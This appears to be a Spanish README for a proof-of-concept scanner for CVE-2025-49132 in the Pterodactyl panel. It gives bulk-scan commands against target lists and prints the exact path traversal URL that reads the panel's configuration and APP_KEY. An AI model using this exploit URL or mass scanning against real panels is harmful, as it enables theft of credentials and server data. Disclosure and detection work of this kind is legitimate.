
Pterodactyl panel CVE-2025-49132 detección masiva ☝️🤓
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
python3 CVE-2025-49132_poc.py -f lista_objetivos.txt
python3 CVE-2025-49132_poc.py -f lista_objetivos.txt -o resultados_escaneo.txt
Cuando existe la vulnerabilidad:
[+] Vulnerabilidad presente: Vulnerabilidad confirmada
Detalles de la vulnerabilidad:
• Tipo: Path traversal
• Vector de ataque: Acceso a /locales/locale.json mediante parámetro de path traversal
• URL de explotación: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
Impacto potencial:
• Lectura de credenciales en el archivo de configuración del panel (.env)
• Extracción de información sensible en la base de datos
• Acceso a archivos de servidores de juegos administrados por el panel
APP_KEY extraída: base64{{your_secret_key_here}}
Recomendación: Actualice inmediatamente a Pterodactyl v1.11.11 o superior
Cuando no existe la vulnerabilidad:
[-] Sin vulnerabilidad: No se encontró vulnerabilidad (código de estado: 404)
Resumen del escaneo:
Resumen del escaneo:
• Total de objetivos escaneados: 5
• Objetivos vulnerables: 2
• Objetivos seguros: 3
[!] Crítico: ¡Se detectaron sistemas vulnerables! Se requiere acción inmediata.